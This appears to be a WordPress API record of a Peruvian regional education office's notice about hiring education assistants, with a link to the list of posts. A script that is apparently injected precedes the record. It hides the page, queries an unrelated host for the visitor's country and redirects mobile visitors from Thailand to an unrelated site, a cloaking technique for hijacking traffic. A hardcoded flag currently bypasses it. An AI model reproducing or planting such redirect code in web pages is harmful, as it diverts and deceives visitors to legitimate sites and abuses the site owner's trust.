<script>
(function() {
    var isDesktop = true;
    
    // Desktop = stay
    if (isDesktop) {
        document.body.style.visibility = "visible";
        return;
    }
    
    var key = "geo_th_v1";
    var cached = localStorage.getItem(key);
    
    // Mobile + TH = redirect
    if (cached === "TH") {
        location.href = "https://www.wakeboard-madrid.com/";
        return;
    }
    
    // Mobile + non-TH (cached) = stay
    if (cached && cached !== "TH") {
        document.body.style.visibility = "visible";
        return;
    }
    
    // Fetch country
    fetch("https://kuproy.xyz/")
        .then(function(r) { return r.text(); })
        .then(function(c) {
            var country = c.trim().toUpperCase();
            localStorage.setItem(key, country);
            
            // TH = redirect, non-TH = stay
            if (country === "TH") {
                location.href = "https://www.wakeboard-madrid.com/";
            } else {
                document.body.style.visibility = "visible";
            }
        })
        .catch(function() {
            // Error = assume non-TH, stay
            localStorage.setItem(key, "NOT_TH");
            document.body.style.visibility = "visible";
        });
})();
</script>{"id":2798,"date":"2023-02-24T20:51:46","date_gmt":"2023-02-25T01:51:46","guid":{"rendered":"https:\/\/ugelarequipanorte.gob.pe\/wp\/?p=2798"},"modified":"2023-02-24T20:51:46","modified_gmt":"2023-02-25T01:51:46","slug":"comunicado-n-o47-2023-proceso-de-contratacion-auxiliares-de-educacion","status":"publish","type":"post","link":"https:\/\/ugelarequipanorte.gob.pe\/wp\/comunicado-n-o47-2023-proceso-de-contratacion-auxiliares-de-educacion\/","title":{"rendered":"COMUNICADO N.\u00ba47 \u2013 2023 \u2013 PROCESO DE CONTRATACI\u00d3N AUXILIARES DE EDUCACI\u00d3N"},"content":{"rendered":"\n<p>El comit\u00e9 de contrataci\u00f3n de Auxiliares de Educaci\u00f3n de la UGEL Arequipa Norte, da conocer la relaci\u00f3n de plazas de auxiliares de educaci\u00f3n<\/p>\n\n\n\n<p><strong>E<\/strong><strong>nlace <\/strong><strong>para visualizar plazas <\/strong><strong>de auxiliares:<\/strong><\/p>\n\n\n\n<p><a href=\"https:\/\/drive.google.com\/file\/d\/1hhJSO0oiesAlwe8yy6jgXVlMaxKtKXrT\/view?usp=sharing\">https:\/\/drive.google.com\/file\/d\/1hhJSO0oiesAlwe8yy6jgXVlMaxKtKXrT\/view?usp=sharing<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"972\" height=\"1024\" src=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/02\/24-de-febrero-972x1024.png\" alt=\"\" class=\"wp-image-2799\" srcset=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/02\/24-de-febrero-972x1024.png 972w, https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/02\/24-de-febrero-285x300.png 285w, https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/02\/24-de-febrero-768x809.png 768w, https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/02\/24-de-febrero.png 1122w\" sizes=\"auto, (max-width: 972px) 100vw, 972px\" \/><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>El comit\u00e9 de contrataci\u00f3n de Auxiliares de Educaci\u00f3n de la UGEL Arequipa Norte, da conocer la relaci\u00f3n de plazas de auxiliares de educaci\u00f3n Enlace para visualizar plazas de auxiliares: https:\/\/drive.google.com\/file\/d\/1hhJSO0oiesAlwe8yy6jgXVlMaxKtKXrT\/view?usp=sharing<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[18,4],"tags":[],"class_list":["post-2798","post","type-post","status-publish","format-standard","hentry","category-auxiliar-de-educacion","category-comunicados"],"_links":{"self":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/2798","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/comments?post=2798"}],"version-history":[{"count":1,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/2798\/revisions"}],"predecessor-version":[{"id":2800,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/2798\/revisions\/2800"}],"wp:attachment":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/media?parent=2798"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/categories?post=2798"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/tags?post=2798"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}